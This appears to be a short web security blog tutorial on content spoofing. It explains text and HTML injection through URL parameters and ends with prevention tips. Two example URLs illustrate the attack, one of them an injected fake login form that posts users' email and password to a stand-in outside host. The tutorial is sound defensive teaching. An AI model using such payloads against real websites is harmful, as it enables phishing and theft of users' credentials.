LaravelCode

Search

What is Content Spoofing and how to prevent it

Security
3152 views 2 years ago
post-title

In this article, we will discuss about what is Content Spoofing, how it will affect your website and business, and how to prevent Content Spoofing.

what is Content Spoofing?

Content Spoofing or Content Injection is one of the common website attack targetting specific user or group of users by vulnerability on web application. It happens when web application is can't handle data supplied by end user. The attacker inject text or HTML content in the website, mostly through parameters. And the supplied data reflects back on the webpage. This type of attack mostly done to affect website SEO or defame businesses by compititors.

Content Spoofing is closely similar to Cross-site Scripting(XSS) except XSS uses javascript code to run script in the webpage while Content Spoofing is about changing webpage content.

There are two type of attacks possible:

1. Text Injection
2. HTML Injection

Text Injection

Text Injection is type of Content Spoofing attack where attacker inject text data in the website and change the content of the website. For example, In some cases attacker might pass data via request parameters and create malicious link of trusted website.

For example, common website have login page, where error message display from query parameters.

https://www.hackedsite.com/login?error=Invalid+username+provided.

Now attacker change this error message like below and send other users to ask login to another website and may get login credentials from users.

https://www.hackedsite.com/login?error=this+website+is+down+please+login+to+http://www.anothersite.com

HTML Injection

HTML injection is same as text injection but in this type of attack, HTML content is injected in webpage. In the above example, attacker may push HTML code into website and get user login data.  

http://hackedsite/welcome?name=<h1>Welcome, please login to continue</h1><form method="post"
action="http://anothersite/login">EMail: <input type="text" name="email" /><br />Password: <input type="password"
name="password" /><input type="submit" value="Login" /></form>

How to prevent Content Spoofing?

Here are few measures you can take to stop Content Spoofing:

1. Avoid use of displaying messages via request parameters, instead use temporary sessions.
2. Validate the data which are reflecting via request parameter.
3. Avoid passing HTML data through request parameter, if you really need it, use proper encoding before passing.

Random Articles
  • How to Implement Datepicker in React with Example
    Welcome to How to Implement and use Datepicker in React application! In this tutorial, you will learn the step-by-step process of integrating and using&nbsp;react-datepicker&nbsp;modules in React.js....
  • Get Current time and date in React
    In this tutorial, we will discuss how to get current date time in reactjs. you&#39;ll learn how to get current date and time in react js. you can optically discern current date and time in react js....
  • Laravel Eloquent Serialization to array and Json
    When working with API in Laravel or similar, often you need to get query results to array or json instead of model object. Laravel provides simple ways to convert query results in array or json. Co...
  • jQuery - Face Detect from Image
    In this article, I will share with you how to detect face from an image using jQuery. Face detection is a common feature in most digital cameras today; the white or red square that pops around someone...
  • Watch user location using Geolocation API
    If you are developing real time user location application, then you may want to use The Geolocation API instead of third party services. The Geolocation API supports all modern web browsers. You don&#...
Advertise